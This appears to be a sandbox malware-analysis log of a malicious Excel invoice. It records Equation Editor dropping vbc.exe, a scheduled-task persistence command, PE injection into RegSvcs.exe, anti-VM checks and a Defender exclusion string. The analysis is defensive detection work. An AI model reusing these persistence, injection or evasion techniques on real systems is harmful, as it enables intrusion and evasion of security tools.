          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
          Source: unknownProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsxStatic file information: File size 2355200 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: System.pdbWindows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
          Source: Binary string: ystem.pdb- source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
          Source: Binary string: =T3UpC:\Windows\System.pdbA!`y source: RegSvcs.exe, 00000007.00000002.2395879525.0000000004FDC000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\RegSvcs.pdbN source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
          Source: Binary string: ps.pdb source: RegSvcs.exe, 00000007.00000002.2394056812.00000000008BD000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\dll\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
          Source: Binary string: System.EnterpriseServices.Wrapper.pdb source: smtpsvc.exe, 00000008.00000002.2225121272.0000000001D90000.00000002.00000001.sdmp
          Source: Binary string: C:\Windows\System.pdb``[ source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
          Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000007.00000003.2194043943.00000000006E3000.00000004.00000001.sdmp, smtpsvc.exe, smtpsvc.exe.7.dr
          Source: Binary string: indows\System.pdbpdbtem.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\symbols\dll\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
          Source: Binary string: System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
          Source: Binary string: System.pdb8 source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
          Source: Binary string: mscorrc.pdb source: vbc.exe, 00000004.00000002.2194187602.0000000000B10000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2394185585.0000000002130000.00000002.00000001.sdmp
          Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
          Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsxInitial sample: OLE indicators vbamacros = False
          Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\Public\vbc.exeCode function: 4_2_011D6A9F push es; iretd
          Source: C:\Users\Public\vbc.exeCode function: 4_2_011DA2BC push es; retf
          Source: C:\Users\Public\vbc.exeCode function: 4_2_011DA0AC push es; retf
          Source: C:\Users\Public\vbc.exeCode function: 4_2_011DA2FE push es; retf
          Source: C:\Users\Public\vbc.exeCode function: 4_2_011DA274 push es; retf
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00146D35 push esp; retf
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00147FF9 push esp; retf
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002EC4B5 push CCFFFFFEh; ret
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002EC55D push edi; retf
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002ECE17 push esp; retf
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_001A5E25 push esp; retf
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_001A9D62 push eax; retf
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_001A9D66 pushad ; retf
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_001A989B push ecx; retf 001Ah
          Source: initial sampleStatic PE information: section name: .text entropy: 7.9540154939
          Source: initial sampleStatic PE information: section name: .text entropy: 7.9540154939
          Source: initial sampleStatic PE information: section name: .text entropy: 7.9540154939
          Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
          Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\gmSlQSien.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exeJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile created: C:\Program Files (x86)\SMTP Service\smtpsvc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe:Zone.Identifier read attributes | delete
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
          Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsxStream path 'EncryptedPackage' entropy: 7.9998366813 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.26b2ea0.3.raw.unpack, type: UNPACKEDPE
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeWindow / User API: threadDelayed 546
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2388Thread sleep time: -300000s >= -30000s
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2388Thread sleep time: -60000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2488Thread sleep time: -104850s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2656Thread sleep time: -60000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2272Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 1100Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_004F0D66 GetSystemInfo,
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 104850
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
          Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: vbc.exe, 00000004.00000002.2193832055.000000000056C000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Allocates memory in foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 protect: page execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A
          Writes to foreign memory regionsShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000
